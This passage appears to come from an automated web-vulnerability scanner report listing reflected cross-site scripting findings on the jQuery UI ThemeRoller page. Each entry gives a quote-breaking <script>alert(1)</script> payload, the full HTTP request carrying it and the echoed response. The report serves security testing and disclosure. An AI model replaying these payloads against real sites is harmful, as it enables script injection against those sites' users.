0&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:22:42 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120068

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normalfd043"><script>alert(1)</script>ac1313806c7&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&
...[SNIP]...

2.71. http://jqueryui.com/themeroller/ [iconColorActive parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc56e"><script>alert(1)</script>b6fd687b91b was submitted in the iconColorActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545dc56e"><script>alert(1)</script>b6fd687b91b&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:07 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
erColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545dc56e"><script>alert(1)</script>b6fd687b91b&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_so
...[SNIP]...

2.72. http://jqueryui.com/themeroller/ [iconColorContent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37bd2"><script>alert(1)</script>542322e3a20 was submitted in the iconColorContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=22222237bd2"><script>alert(1)</script>542322e3a20&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:22:53 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
derColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=22222237bd2"><script>alert(1)</script>542322e3a20&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_h
...[SNIP]...

2.73. http://jqueryui.com/themeroller/ [iconColorDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 121f8"><script>alert(1)</script>339bbf5b28c was submitted in the iconColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888121f8"><script>alert(1)</script>339bbf5b28c&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:22:58 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
nt=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888121f8"><script>alert(1)</script>339bbf5b28c&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bg
...[SNIP]...

2.74. http://jqueryui.com/themeroller/ [iconColorError parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f680b"><script>alert(1)</script>a08033f67f2 was submitted in the iconColorError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0af680b"><script>alert(1)</script>a08033f67f2&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:17 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0af680b"><script>alert(1)</script>a08033f67f2&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&of
...[SNIP]...

2.75. http://jqueryui.com/themeroller/ [iconColorHeader parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f99b"><script>alert(1)</script>e7938fcd6a0 was submitted in the iconColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=2222223f99b"><script>alert(1)</script>e7938fcd6a0&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:22:48 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=2222223f99b"><script>alert(1)</script>e7938fcd6a0&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.pn
...[SNIP]...

2.76. http://jqueryui.com/themeroller/ [iconColorHighlight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6309"><script>alert(1)</script>9ad591495d9 was submitted in the iconColorHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83fff6309"><script>alert(1)</script>9ad591495d9&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:12 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
e=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83fff6309"><script>alert(1)</script>9ad591495d9&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOv
...[SNIP]...

2.77. http://jqueryui.com/themeroller/ [iconColorHover parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload df23d"><script>alert(1)</script>420d9ca6e8e was submitted in the iconColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545df23d"><script>alert(1)</script>420d9ca6e8e&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:03 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
erColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545df23d"><script>alert(1)</script>420d9ca6e8e&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png
...[SNIP]...

2.78. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab231"><script>alert(1)</script>a044bec90e3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ab231"><script>alert(1)</script>a044bec90e3=1 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:21:58 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 117123

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ab231"><script>alert(1)</script>a044bec90e3=1" type="text/css" media="all" />
...[SNIP]...

2.79. http://jqueryui.com/themeroller/ [offsetLeftShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the offsetLeftShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b491a"><script>alert(1)</script>6437ba3b123 was submitted in the offsetLeftShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8pxb491a"><script>alert(1)</script>6437ba3b123&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:25 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8pxb491a"><script>alert(1)</script>6437ba3b123&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

2.80. http://jqueryui.com/themeroller/ [offsetTopShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the offsetTopShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c65d"><script>alert(1)</script>1ac0e87e35d was submitted in the offsetTopShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px7c65d"><script>alert(1)